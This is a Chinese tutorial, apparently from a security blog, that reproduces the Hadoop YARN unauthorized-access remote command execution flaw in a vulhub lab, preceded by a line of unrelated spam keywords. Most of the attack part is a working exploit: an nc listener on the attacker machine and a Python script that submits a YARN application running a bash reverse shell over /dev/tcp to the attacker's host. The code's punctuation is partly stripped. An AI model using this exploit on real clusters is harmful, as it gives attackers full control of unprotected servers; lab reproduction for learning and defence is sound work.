百度采购网官方网站,wordpress新增php页面,佛山便宜网站建设,企查查官网查企业网页版数据库安全#xff1a;Hadoop 未授权访问-命令执行漏洞.
Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当#xff0c;导致可以未经授权进行访问#xff0c;从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令#xff0c;最终完…数据库安全Hadoop 未授权访问-命令执行漏洞.
Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当导致可以未经授权进行访问从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令最终完全控制服务器。 目录
数据库安全Hadoop 未授权访问-命令执行漏洞.
Hadoop 未授权访问-命令执行漏洞
开启 vulhub 靶场环境
Hadoop 未授权访问-命令执行漏洞测试 Hadoop 未授权访问-命令执行漏洞
开启 vulhub 靶场环境 第一步切换到 vulhub 目录下
cd vulhub 第二步切换到 hadoop 目录下
cd hadoop 第三步切换到 unauthorized-yarn 漏洞目录下. 第四步开启 漏洞 服务.
docker-compose up -d 第五步访问 http:// (靶场 IP 地址):8088 Hadoop 未授权访问-命令执行漏洞测试
第一步访问 /cluster/apps 页面【如果 该页面存在的话说明存在未授权访问漏洞】
http://192.168.0.106:8088/cluster/apps 第二步在 攻击机kali设置监听.
nc -nvlp 8888// 设置 监听 端口为8888 第三步编写 Python 执行代码.
import requestsdef shell(url,vps_ip,port):headers {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36}response requests.post(url/ws/v1/cluster/apps/new-application,headersheaders)id response.json()[application-id]data {application-id: id,application-name: getshell,am-container-spec: {commands: {command: /bin/bash -i /dev/tcp/%s/%s 01%(vps_ip,port)},},application-type: YARN}exploit requests.post(url/ws/v1/cluster/apps,headersheaders,jsondata)print([] 执行完成)if __name__ __main__:url input(目标的URL:)vps_ip input(监听的主机IP地址(kali):)port input(监听的主机端口(kali):)shell(url,vps_ip,port)
执行代码 第四步返回 监听的主机查看结果发现已经成功. 参考文章Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客
学习链接第55天服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili